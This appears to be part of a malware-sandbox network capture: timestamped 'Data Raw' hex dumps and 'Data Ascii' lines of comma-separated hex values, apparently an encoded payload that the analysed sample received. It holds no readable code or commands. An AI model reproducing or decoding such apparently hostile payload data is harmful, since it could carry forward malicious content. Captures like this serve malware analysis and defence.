                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC203INData Raw: 2c 63 37 2c 31 34 33 2c 39 37 2c 31 36 37 2c 35 34 2c 35 61 2c 36 37 2c 36 36 2c 61 63 2c 35 32 2c 31 35 63 2c 62 36 2c 31 36 63 2c 31 34 61 2c 31 37 36 2c 63 38 2c 66 34 2c 61 36 2c 34 36 2c 38 34 2c 31 32 33 2c 39 35 2c 31 35 30 2c 35 61 2c 37 39 2c 66 38 2c 39 34 2c 31 33 39 2c 31 30 36 2c 31 33 37 2c 63 61 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 66 35 2c 38 33 2c 31 32 36 2c 61 31 2c 36 37 2c 39 35 2c 66 38 2c 31 30 37 2c 66 66 2c 31 35 39 2c 63 32 2c 64 36 2c 31 36 33 2c 39 61 2c 66 33 2c 31 31 61 2c 34 34 2c 35 31 2c 36 33 2c 61 63 2c 31 36 34 2c 36 64 2c 34 61 2c 31 32 38 2c 37 61 2c 37 30 2c 31 34 32 2c 63 34 2c 33 39 2c 31 34 64 2c 38 31 2c 64 63 2c 31 34 32 2c 61 63 2c 35 34 2c 64 62 2c 31 32 65 2c 31 34 61 2c 33 62 2c 34 34 2c 37 34 2c 64 62 2c
                                                                                                                                                                                                                            Data Ascii: ,c7,143,97,167,54,5a,67,66,ac,52,15c,b6,16c,14a,176,c8,f4,a6,46,84,123,95,150,5a,79,f8,94,139,106,137,ca,14d,16b,14b,f5,83,126,a1,67,95,f8,107,ff,159,c2,d6,163,9a,f3,11a,44,51,63,ac,164,6d,4a,128,7a,70,142,c4,39,14d,81,dc,142,ac,54,db,12e,14a,3b,44,74,db,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC207INData Raw: 65 2c 62 34 2c 62 63 2c 31 36 66 2c 31 34 32 2c 61 38 2c 38 31 2c 31 34 64 2c 61 32 2c 39 66 2c 31 35 31 2c 38 30 2c 65 63 2c 31 34 61 2c 61 38 2c 36 32 2c 39 37 2c 61 32 2c 63 66 2c 31 32 33 2c 31 33 30 2c 62 35 2c 37 61 2c 31 32 62 2c 65 65 2c 39 34 2c 34 31 2c 35 31 2c 62 63 2c 64 38 2c 31 35 64 2c 35 39 2c 62 61 2c 34 64 2c 61 33 2c 37 33 2c 31 32 62 2c 66 63 2c 39 33 2c 34 65 2c 36 63 2c 61 35 2c 64 37 2c 31 32 62 2c 63 39 2c 37 39 2c 65 61 2c 39 66 2c 39 30 2c 66 34 2c 62 62 2c 35 61 2c 36 65 2c 63 30 2c 38 64 2c 61 62 2c 31 33 30 2c 33 32 2c 34 31 2c 35 31 2c 31 34 62 2c 37 65 2c 31 36 33 2c 31 35 37 2c 31 34 35 2c 61 30 2c 31 33 38 2c 37 30 2c 34 33 2c 34 66 2c 31 31 39 2c 36 64 2c 31 36 61 2c 31 34 62 2c 31 35 31 2c 63 34 2c 61 64 2c 31 31 64 2c
                                                                                                                                                                                                                            Data Ascii: e,b4,bc,16f,142,a8,81,14d,a2,9f,151,80,ec,14a,a8,62,97,a2,cf,123,130,b5,7a,12b,ee,94,41,51,bc,d8,15d,59,ba,4d,a3,73,12b,fc,93,4e,6c,a5,d7,12b,c9,79,ea,9f,90,f4,bb,5a,6e,c0,8d,ab,130,32,41,51,14b,7e,163,157,145,a0,138,70,43,4f,119,6d,16a,14b,151,c4,ad,11d,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC211INData Raw: 37 35 2c 35 38 2c 31 33 66 2c 61 31 2c 36 64 2c 34 62 2c 31 30 32 2c 37 38 2c 65 30 2c 31 32 32 2c 38 32 2c 35 31 2c 31 30 36 2c 37 35 2c 31 33 30 2c 39 66 2c 34 36 2c 61 63 2c 34 66 2c 66 33 2c 38 30 2c 36 37 2c 66 63 2c 39 35 2c 36 63 2c 34 63 2c 63 36 2c 37 38 2c 64 37 2c 39 37 2c 38 33 2c 31 32 64 2c 37 66 2c 34 34 2c 37 34 2c 63 65 2c 37 31 2c 64 30 2c 31 33 37 2c 62 38 2c 35 38 2c 64 33 2c 65 35 2c 31 34 31 2c 61 34 2c 35 35 2c 31 30 38 2c 37 30 2c 31 31 31 2c 37 66 2c 33 39 2c 31 31 31 2c 66 33 2c 31 33 66 2c 37 32 2c 34 65 2c 31 33 33 2c 35 31 2c 36 36 2c 31 33 36 2c 39 62 2c 35 61 2c 31 35 38 2c 36 38 2c 37 39 2c 34 34 2c 66 64 2c 38 66 2c 38 39 2c 31 31 36 2c 62 65 2c 34 33 2c 64 37 2c 35 32 2c 31 30 63 2c 39 38 2c 36 33 2c 31 35 34 2c 37 61 2c
                                                                                                                                                                                                                            Data Ascii: 75,58,13f,a1,6d,4b,102,78,e0,122,82,51,106,75,130,9f,46,ac,4f,f3,80,67,fc,95,6c,4c,c6,78,d7,97,83,12d,7f,44,74,ce,71,d0,137,b8,58,d3,e5,141,a4,55,108,70,111,7f,39,111,f3,13f,72,4e,133,51,66,136,9b,5a,158,68,79,44,fd,8f,89,116,be,43,d7,52,10c,98,63,154,7a,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC223INData Raw: 33 2c 39 61 2c 63 62 2c 39 33 2c 38 61 2c 35 62 2c 31 34 39 2c 38 61 2c 33 34 2c 61 37 2c 34 36 2c 31 33 39 2c 63 64 2c 38 34 2c 36 35 2c 35 38 2c 61 65 2c 33 63 2c 33 61 2c 37 30 2c 34 33 2c 31 30 64 2c 38 31 2c 31 31 39 2c 62 33 2c 34 63 2c 61 38 2c 62 65 2c 64 63 2c 37 37 2c 62 62 2c 31 32 65 2c 37 66 2c 34 34 2c 31 37 33 2c 36 66 2c 31 30 64 2c 31 33 62 2c 62 38 2c 34 33 2c 64 35 2c 37 36 2c 31 32 33 2c 39 38 2c 36 33 2c 64 65 2c 39 61 2c 31 33 63 2c 31 30 64 2c 37 66 2c 33 39 2c 61 62 2c 31 30 36 2c 63 33 2c 33 38 2c 64 37 2c 62 31 2c 31 34 38 2c 38 61 2c 38 33 2c 63 39 2c 35 64 2c 66 30 2c 64 37 2c 31 33 34 2c 63 66 2c 63 39 2c 31 35 36 2c 66 61 2c 39 30 2c 31 36 66 2c 39 33 2c 38 37 2c 38 35 2c 63 65 2c 63 65 2c 31 35 37 2c 31 33 64 2c 36 66 2c 31
                                                                                                                                                                                                                            Data Ascii: 3,9a,cb,93,8a,5b,149,8a,34,a7,46,139,cd,84,65,58,ae,3c,3a,70,43,10d,81,119,b3,4c,a8,be,dc,77,bb,12e,7f,44,173,6f,10d,13b,b8,43,d5,76,123,98,63,de,9a,13c,10d,7f,39,ab,106,c3,38,d7,b1,148,8a,83,c9,5d,f0,d7,134,cf,c9,156,fa,90,16f,93,87,85,ce,ce,157,13d,6f,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC227INData Raw: 31 31 32 2c 31 33 33 2c 61 39 2c 33 38 2c 34 35 2c 37 34 2c 35 62 2c 36 64 2c 65 63 2c 65 37 2c 31 31 30 2c 37 62 2c 33 32 2c 65 34 2c 62 64 2c 31 32 66 2c 39 63 2c 36 35 2c 31 31 66 2c 34 62 2c 39 38 2c 31 30 35 2c 62 37 2c 34 33 2c 35 38 2c 33 35 2c 34 65 2c 31 32 63 2c 31 31 33 2c 35 37 2c 63 66 2c 31 32 30 2c 61 31 2c 36 37 2c 36 33 2c 33 38 2c 34 34 2c 37 34 2c 66 62 2c 66 64 2c 66 66 2c 62 65 2c 34 33 2c 62 64 2c 62 37 2c 31 31 39 2c 31 34 64 2c 31 36 32 2c 31 35 34 2c 31 30 36 2c 65 63 2c 66 61 2c 37 66 2c 33 39 2c 66 39 2c 63 38 2c 31 32 62 2c 31 32 64 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 36 37 2c 64 62 2c 31 34 34 2c 39 62 2c 36 37 2c 31 30 35 2c 65 38 2c 31 31 30 2c 62 62 2c 35 61 2c 64 37 2c 34 63 2c 31 35 66 2c 31 31 65 2c 31 32 39 2c 31 33
                                                                                                                                                                                                                            Data Ascii: 112,133,a9,38,45,74,5b,6d,ec,e7,110,7b,32,e4,bd,12f,9c,65,11f,4b,98,105,b7,43,58,35,4e,12c,113,57,cf,120,a1,67,63,38,44,74,fb,fd,ff,be,43,bd,b7,119,14d,162,154,106,ec,fa,7f,39,f9,c8,12b,12d,14d,16b,14b,67,db,144,9b,67,105,e8,110,bb,5a,d7,4c,15f,11e,129,13
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC243INData Raw: 2c 62 38 2c 35 39 2c 31 33 30 2c 36 33 2c 62 38 2c 31 33 63 2c 39 33 2c 36 62 2c 64 66 2c 31 35 32 2c 31 35 32 2c 36 34 2c 36 62 2c 31 34 33 2c 63 61 2c 31 34 32 2c 65 31 2c 39 64 2c 37 37 2c 34 33 2c 62 66 2c 66 38 2c 31 30 32 2c 31 34 39 2c 36 38 2c 65 30 2c 36 39 2c 64 64 2c 34 36 2c 31 30 39 2c 38 30 2c 37 30 2c 63 36 2c 31 33 35 2c 35 30 2c 31 30 66 2c 31 35 32 2c 35 32 2c 61 62 2c 31 33 31 2c 39 38 2c 38 61 2c 36 62 2c 36 32 2c 62 64 2c 31 34 33 2c 65 38 2c 36 36 2c 63 34 2c 31 33 33 2c 38 38 2c 65 37 2c 31 33 33 2c 31 33 31 2c 39 61 2c 64 34 2c 31 32 62 2c 31 35 34 2c 31 35 30 2c 35 61 2c 37 39 2c 66 38 2c 39 38 2c 63 65 2c 61 30 2c 31 31 32 2c 39 62 2c 35 65 2c 64 34 2c 38 63 2c 38 39 2c 61 64 2c 35 34 2c 31 34 32 2c 31 33 32 2c 31 32 64 2c 31 33
                                                                                                                                                                                                                            Data Ascii: ,b8,59,130,63,b8,13c,93,6b,df,152,152,64,6b,143,ca,142,e1,9d,77,43,bf,f8,102,149,68,e0,69,dd,46,109,80,70,c6,135,50,10f,152,52,ab,131,98,8a,6b,62,bd,143,e8,66,c4,133,88,e7,133,131,9a,d4,12b,154,150,5a,79,f8,98,ce,a0,112,9b,5e,d4,8c,89,ad,54,142,132,12d,13
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC255INData Raw: 2c 36 64 2c 31 30 38 2c 63 36 2c 37 34 2c 61 38 2c 31 34 64 2c 63 35 2c 38 39 2c 31 33 37 2c 31 33 38 2c 31 36 66 2c 62 38 2c 31 34 37 2c 31 31 39 2c 62 33 2c 61 66 2c 31 34 62 2c 31 35 31 2c 63 34 2c 31 33 66 2c 31 32 63 2c 66 30 2c 39 61 2c 34 37 2c 66 62 2c 65 61 2c 39 32 2c 66 61 2c 38 65 2c 38 33 2c 39 33 2c 39 65 2c 34 37 2c 39 37 2c 64 65 2c 61 38 2c 31 34 35 2c 63 66 2c 35 39 2c 39 36 2c 31 32 30 2c 31 31 34 2c 38 34 2c 34 33 2c 34 66 2c 62 63 2c 31 34 36 2c 66 39 2c 38 66 2c 36 32 2c 62 62 2c 62 65 2c 36 65 2c 62 64 2c 65 66 2c 37 64 2c 31 33 34 2c 64 65 2c 35 62 2c 62 64 2c 31 33 33 2c 31 33 65 2c 35 37 2c 33 34 2c 33 32 2c 34 63 2c 31 34 39 2c 66 30 2c 39 38 2c 37 39 2c 61 38 2c 62 30 2c 34 65 2c 38 66 2c 66 64 2c 38 38 2c 31 33 66 2c 39 62 2c
                                                                                                                                                                                                                            Data Ascii: ,6d,108,c6,74,a8,14d,c5,89,137,138,16f,b8,147,119,b3,af,14b,151,c4,13f,12c,f0,9a,47,fb,ea,92,fa,8e,83,93,9e,47,97,de,a8,145,cf,59,96,120,114,84,43,4f,bc,146,f9,8f,62,bb,be,6e,bd,ef,7d,134,de,5b,bd,133,13e,57,34,32,4c,149,f0,98,79,a8,b0,4e,8f,fd,88,13f,9b,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC271INData Raw: 31 33 31 2c 65 65 2c 63 64 2c 35 32 2c 31 33 37 2c 61 65 2c 38 34 2c 31 34 32 2c 63 34 2c 34 31 2c 31 34 64 2c 65 31 2c 35 38 2c 31 35 31 2c 65 30 2c 35 63 2c 31 35 39 2c 64 63 2c 37 65 2c 31 33 37 2c 35 39 2c 39 34 2c 31 34 62 2c 61 65 2c 34 62 2c 31 30 32 2c 31 33 62 2c 36 66 2c 31 32 35 2c 62 35 2c 35 38 2c 62 39 2c 31 33 64 2c 31 33 33 2c 38 37 2c 31 34 35 2c 31 33 37 2c 39 32 2c 66 62 2c 31 30 61 2c 64 63 2c 39 36 2c 31 33 61 2c 63 62 2c 61 61 2c 61 64 2c 66 36 2c 61 31 2c 31 35 36 2c 39 61 2c 31 32 66 2c 31 32 30 2c 61 61 2c 63 39 2c 31 35 39 2c 31 36 63 2c 31 31 34 2c 31 33 61 2c 63 65 2c 31 33 33 2c 38 37 2c 63 63 2c 31 33 64 2c 65 36 2c 31 34 31 2c 37 35 2c 31 35 37 2c 62 62 2c 34 30 2c 63 36 2c 62 64 2c 31 33 33 2c 31 33 37 2c 31 32 33 2c 64 34
                                                                                                                                                                                                                            Data Ascii: 131,ee,cd,52,137,ae,84,142,c4,41,14d,e1,58,151,e0,5c,159,dc,7e,137,59,94,14b,ae,4b,102,13b,6f,125,b5,58,b9,13d,133,87,145,137,92,fb,10a,dc,96,13a,cb,aa,ad,f6,a1,156,9a,12f,120,aa,c9,159,16c,114,13a,ce,133,87,cc,13d,e6,141,75,157,bb,40,c6,bd,133,137,123,d4
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC287INData Raw: 34 2c 63 66 2c 31 37 33 2c 61 66 2c 66 38 2c 31 33 37 2c 31 30 32 2c 39 30 2c 33 63 2c 65 61 2c 38 65 2c 61 62 2c 36 33 2c 35 35 2c 63 62 2c 39 31 2c 34 37 2c 61 63 2c 33 64 2c 61 33 2c 31 30 33 2c 61 63 2c 66 34 2c 64 39 2c 61 64 2c 38 38 2c 35 35 2c 31 32 63 2c 64 35 2c 39 32 2c 62 37 2c 61 37 2c 33 38 2c 34 34 2c 65 39 2c 31 34 39 2c 61 30 2c 31 31 64 2c 31 33 30 2c 34 65 2c 33 35 2c 33 32 2c 34 31 2c 62 37 2c 39 63 2c 39 64 2c 37 64 2c 36 37 2c 64 61 2c 66 61 2c 63 34 2c 31 33 32 2c 61 30 2c 31 31 32 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 63 66 2c 31 37 33 2c 61 66 2c 66 38 2c 31 33 37 2c 31 30 32 2c 38 38 2c 33 63 2c 62 64 2c 38 39 2c 38 64 2c 36 36 2c 31 31
                                                                                                                                                                                                                            Data Ascii: 4,cf,173,af,f8,137,102,90,3c,ea,8e,ab,63,55,cb,91,47,ac,3d,a3,103,ac,f4,d9,ad,88,55,12c,d5,92,b7,a7,38,44,e9,149,a0,11d,130,4e,35,32,41,b7,9c,9d,7d,67,da,fa,c4,132,a0,112,fd,11a,138,118,11e,137,120,126,133,12e,104,cf,173,af,f8,137,102,88,3c,bd,89,8d,66,11
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC303INData Raw: 32 2c 35 62 2c 61 36 2c 36 35 2c 31 36 62 2c 31 30 31 2c 66 32 2c 31 36 38 2c 31 35 33 2c 31 35 39 2c 66 34 2c 65 37 2c 31 31 30 2c 31 34 31 2c 31 37 33 2c 31 35 39 2c 63 30 2c 62 35 2c 39 37 2c 31 32 62 2c 38 66 2c 31 32 37 2c 31 34 30 2c 31 35 30 2c 65 36 2c 31 31 39 2c 37 31 2c 31 35 37 2c 66 62 2c 31 30 38 2c 31 33 36 2c 31 36 66 2c 31 34 32 2c 64 61 2c 65 65 2c 65 65 2c 31 36 39 2c 31 34 62 2c 31 35 31 2c 66 38 2c 64 39 2c 31 33 32 2c 31 36 34 2c 31 36 31 2c 31 33 37 2c 64 31 2c 31 30 31 2c 31 32 65 2c 31 36 61 2c 31 34 61 2c 31 37 36 2c 31 32 62 2c 39 35 2c 31 32 37 2c 31 34 30 2c 31 35 30 2c 31 35 39 2c 64 61 2c 31 35 35 2c 31 35 35 2c 31 34 35 2c 31 33 37 2c 34 31 2c 63 39 2c 62 37 2c 36 61 2c 31 32 37 2c 64 33 2c 31 35 63 2c 31 34 39 2c 31 35 31
                                                                                                                                                                                                                            Data Ascii: 2,5b,a6,65,16b,101,f2,168,153,159,f4,e7,110,141,173,159,c0,b5,97,12b,8f,127,140,150,e6,119,71,157,fb,108,136,16f,142,da,ee,ee,169,14b,151,f8,d9,132,164,161,137,d1,101,12e,16a,14a,176,12b,95,127,140,150,159,da,155,155,145,137,41,c9,b7,6a,127,d3,15c,149,151
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC319INData Raw: 2c 31 34 34 2c 63 34 2c 36 39 2c 31 32 33 2c 31 31 65 2c 34 36 2c 31 30 31 2c 61 37 2c 31 35 35 2c 61 35 2c 61 32 2c 31 31 31 2c 36 66 2c 31 30 32 2c 62 64 2c 35 39 2c 65 65 2c 38 36 2c 65 65 2c 63 63 2c 64 62 2c 31 31 38 2c 31 32 34 2c 37 35 2c 63 36 2c 62 33 2c 63 36 2c 31 32 65 2c 36 63 2c 39 36 2c 64 35 2c 31 35 34 2c 35 38 2c 64 66 2c 31 33 39 2c 64 66 2c 31 31 66 2c 63 66 2c 61 39 2c 31 33 32 2c 31 32 63 2c 39 32 2c 37 37 2c 39 31 2c 63 31 2c 38 30 2c 34 32 2c 64 63 2c 31 32 34 2c 65 65 2c 65 38 2c 31 33 61 2c 36 35 2c 33 62 2c 66 62 2c 31 33 31 2c 31 33 62 2c 35 34 2c 62 63 2c 31 31 66 2c 65 64 2c 31 32 65 2c 37 31 2c 36 62 2c 35 34 2c 64 61 2c 66 30 2c 61 37 2c 31 32 63 2c 62 64 2c 37 39 2c 61 34 2c 66 30 2c 31 31 35 2c 31 35 37 2c 38 35 2c 39 65
                                                                                                                                                                                                                            Data Ascii: ,144,c4,69,123,11e,46,101,a7,155,a5,a2,111,6f,102,bd,59,ee,86,ee,cc,db,118,124,75,c6,b3,c6,12e,6c,96,d5,154,58,df,139,df,11f,cf,a9,132,12c,92,77,91,c1,80,42,dc,124,ee,e8,13a,65,3b,fb,131,13b,54,bc,11f,ed,12e,71,6b,54,da,f0,a7,12c,bd,79,a4,f0,115,157,85,9e
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC335INData Raw: 31 2c 31 32 38 2c 31 34 30 2c 63 36 2c 37 66 2c 64 38 2c 63 61 2c 31 34 65 2c 34 36 2c 66 31 2c 31 33 38 2c 31 36 66 2c 34 33 2c 34 66 2c 39 37 2c 38 37 2c 62 39 2c 31 34 36 2c 63 37 2c 37 32 2c 62 61 2c 65 33 2c 61 63 2c 31 35 63 2c 37 66 2c 31 32 66 2c 38 32 2c 63 30 2c 31 36 63 2c 39 30 2c 31 37 31 2c 31 32 65 2c 33 63 2c 31 33 31 2c 38 36 2c 31 34 37 2c 31 34 65 2c 35 38 2c 31 36 34 2c 39 64 2c 31 33 38 2c 66 30 2c 31 33 38 2c 65 66 2c 34 33 2c 34 66 2c 39 37 2c 38 39 2c 31 36 34 2c 35 62 2c 64 34 2c 31 31 36 2c 35 34 2c 35 61 2c 36 37 2c 39 35 2c 66 38 2c 37 37 2c 31 33 64 2c 63 30 2c 61 36 2c 39 30 2c 31 32 66 2c 63 63 2c 37 39 2c 31 31 36 2c 35 30 2c 65 35 2c 31 32 34 2c 64 65 2c 61 61 2c 31 33 38 2c 38 66 2c 62 39 2c 31 31 61 2c 37 30 2c 34 33 2c
                                                                                                                                                                                                                            Data Ascii: 1,128,140,c6,7f,d8,ca,14e,46,f1,138,16f,43,4f,97,87,b9,146,c7,72,ba,e3,ac,15c,7f,12f,82,c0,16c,90,171,12e,3c,131,86,147,14e,58,164,9d,138,f0,138,ef,43,4f,97,89,164,5b,d4,116,54,5a,67,95,f8,77,13d,c0,a6,90,12f,cc,79,116,50,e5,124,de,aa,138,8f,b9,11a,70,43,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC351INData Raw: 33 37 2c 31 33 30 2c 31 31 31 2c 31 36 61 2c 31 34 62 2c 62 61 2c 31 35 38 2c 31 30 36 2c 39 62 2c 36 37 2c 31 34 61 2c 36 37 2c 34 36 2c 31 37 33 2c 31 35 39 2c 63 36 2c 31 30 65 2c 31 33 30 2c 63 33 2c 66 37 2c 37 39 2c 34 31 2c 31 33 61 2c 31 31 34 2c 31 30 38 2c 31 36 33 2c 31 35 37 2c 66 66 2c 62 30 2c 66 64 2c 62 37 2c 34 33 2c 31 33 37 2c 36 61 2c 31 31 32 2c 31 36 61 2c 31 34 62 2c 62 61 2c 36 63 2c 31 30 37 2c 39 62 2c 36 37 2c 31 34 61 2c 34 37 2c 34 36 2c 31 37 33 2c 31 35 39 2c 63 36 2c 31 30 65 2c 64 66 2c 34 65 2c 65 37 2c 37 33 2c 34 31 2c 31 33 39 2c 36 36 2c 35 37 2c 31 36 34 2c 31 35 37 2c 39 66 2c 66 62 2c 66 32 2c 61 30 2c 31 30 38 2c 39 36 2c 33 31 2c 31 33 36 2c 38 33 2c 31 31 30 2c 31 35 30 2c 31 36 61 2c 62 63 2c 36 66 2c 31 31 61
                                                                                                                                                                                                                            Data Ascii: 37,130,111,16a,14b,ba,158,106,9b,67,14a,67,46,173,159,c6,10e,130,c3,f7,79,41,13a,114,108,163,157,ff,b0,fd,b7,43,137,6a,112,16a,14b,ba,6c,107,9b,67,14a,47,46,173,159,c6,10e,df,4e,e7,73,41,139,66,57,164,157,9f,fb,f2,a0,108,96,31,136,83,110,150,16a,bc,6f,11a
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC367INData Raw: 33 2c 31 32 37 2c 31 31 36 2c 39 62 2c 39 38 2c 63 33 2c 39 36 2c 61 63 2c 31 34 66 2c 66 66 2c 38 38 2c 31 30 38 2c 65 30 2c 64 33 2c 36 33 2c 31 33 31 2c 61 30 2c 37 61 2c 39 36 2c 37 36 2c 37 63 2c 31 34 61 2c 38 37 2c 39 63 2c 39 61 2c 39 64 2c 36 62 2c 39 63 2c 61 37 2c 39 39 2c 38 38 2c 61 64 2c 61 61 2c 39 37 2c 31 31 65 2c 36 35 2c 39 31 2c 38 34 2c 39 66 2c 38 38 2c 62 39 2c 66 66 2c 62 30 2c 31 30 33 2c 65 30 2c 62 30 2c 35 31 2c 38 32 2c 38 35 2c 38 31 2c 61 63 2c 62 65 2c 62 31 2c 39 35 2c 37 65 2c 38 34 2c 39 61 2c 61 32 2c 61 61 2c 31 32 62 2c 39 65 2c 38 34 2c 39 37 2c 31 30 66 2c 31 31 38 2c 65 38 2c 65 36 2c 35 64 2c 36 63 2c 37 63 2c 64 34 2c 31 34 35 2c 38 66 2c 38 32 2c 37 30 2c 66 63 2c 64 61 2c 31 30 64 2c 66 33 2c 37 61 2c 35 63 2c
                                                                                                                                                                                                                            Data Ascii: 3,127,116,9b,98,c3,96,ac,14f,ff,88,108,e0,d3,63,131,a0,7a,96,76,7c,14a,87,9c,9a,9d,6b,9c,a7,99,88,ad,aa,97,11e,65,91,84,9f,88,b9,ff,b0,103,e0,b0,51,82,85,81,ac,be,b1,95,7e,84,9a,a2,aa,12b,9e,84,97,10f,118,e8,e6,5d,6c,7c,d4,145,8f,82,70,fc,da,10d,f3,7a,5c,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC383INData Raw: 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 63 30 2c 37 33 2c 37 32 2c 34 33 2c 65 64 2c 36 62 2c 35 30 2c 36 63 2c 66 32 2c 38 63 2c 36 64 2c 35 34 2c 31 31 30 2c 61 31 2c 36 34 2c 33 38 2c 31 30 36 2c 61 65 2c 35 63 2c 36 64 2c 31 31 66 2c 62 31 2c 34 35 2c 33 34 2c 31 31 38 2c 37 62 2c 35 33 2c 36 33 2c 31 34 62 2c 39 66 2c 35 61 2c 34 36 2c 33 65 2c 37 34 2c 37 32 2c 34 33 2c 36 39 2c 36 63 2c 35 30 2c 36 63 2c 38 65 2c 38 64 2c 36 64 2c 35 34 2c 62 34 2c 61 32 2c 36 34 2c 33 38 2c 62 36 2c 61
                                                                                                                                                                                                                            Data Ascii: 58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,c0,73,72,43,ed,6b,50,6c,f2,8c,6d,54,110,a1,64,38,106,ae,5c,6d,11f,b1,45,34,118,7b,53,63,14b,9f,5a,46,3e,74,72,43,69,6c,50,6c,8e,8d,6d,54,b4,a2,64,38,b6,a
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC399INData Raw: 35 31 2c 33 31 2c 35 30 2c 36 63 2c 34 65 2c 35 32 2c 36 64 2c 35 34 2c 35 63 2c 36 37 2c 37 32 2c 33 38 2c 35 34 2c 37 34 2c 36 61 2c 36 64 2c 35 62 2c 37 37 2c 36 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c
                                                                                                                                                                                                                            Data Ascii: 51,31,50,6c,4e,52,6d,54,5c,67,72,38,54,74,6a,6d,5b,77,63,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC415INData Raw: 66 2c 36 63 2c 31 33 34 2c 36 38 2c 61 64 2c 35 34 2c 39 65 2c 61 63 2c 61 35 2c 33 38 2c 31 31 38 2c 38 61 2c 39 63 2c 36 64 2c 38 66 2c 62 63 2c 38 66 2c 33 34 2c 66 36 2c 35 37 2c 39 33 2c 36 33 2c 39 39 2c 61 61 2c 61 62 2c 34 36 2c 65 63 2c 34 66 2c 62 32 2c 34 33 2c 39 34 2c 37 66 2c 39 37 2c 36 63 2c 66 30 2c 36 38 2c 61 64 2c 35 34 2c 61 33 2c 62 62 2c 62 35 2c 33 38 2c 64 63 2c 38 61 2c 39 63 2c 36 64 2c 39 39 2c 63 36 2c 39 35 2c 33 34 2c 62 36 2c 35 37 2c 39 33 2c 36 33 2c 61 33 2c 62 34 2c 61 61 2c 34 36 2c 61 38 2c 34 66 2c 62 32 2c 34 33 2c 39 64 2c 38 30 2c 39 63 2c 36 63 2c 61 34 2c 36 38 2c 61 64 2c 35 34 2c 61 61 2c 62 62 2c 61 34 2c 33 38 2c 38 38 2c 38 61 2c 39 63 2c 36 64 2c 39 30 2c 63 61 2c 39 36 2c 33 34 2c 36 36 2c 35 37 2c 39 33
                                                                                                                                                                                                                            Data Ascii: f,6c,134,68,ad,54,9e,ac,a5,38,118,8a,9c,6d,8f,bc,8f,34,f6,57,93,63,99,aa,ab,46,ec,4f,b2,43,94,7f,97,6c,f0,68,ad,54,a3,bb,b5,38,dc,8a,9c,6d,99,c6,95,34,b6,57,93,63,a3,b4,aa,46,a8,4f,b2,43,9d,80,9c,6c,a4,68,ad,54,aa,bb,a4,38,88,8a,9c,6d,90,ca,96,34,66,57,93
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC431INData Raw: 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 64 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 65 34 2c 31 32 33 2c 39 62 2c 36 64 2c 36 64 2c 37 63 2c 64 36 2c 34 64 2c 33 33 2c 34 31 2c 35 31 2c 36 33 2c 31 34 31 2c 39 33 2c 39 61 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 63 2c 37 37 2c 34 33 2c 33 34 2c 31 33 31 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 31 32 32 2c 31 31 34 2c 39 39 2c 34 36 2c 35 61 2c 33 65 2c 31 30 33 2c 35 63 2c 35 30 2c 33 31 2c 34 65 2c 36 63 2c 36 34 2c 38 31 2c
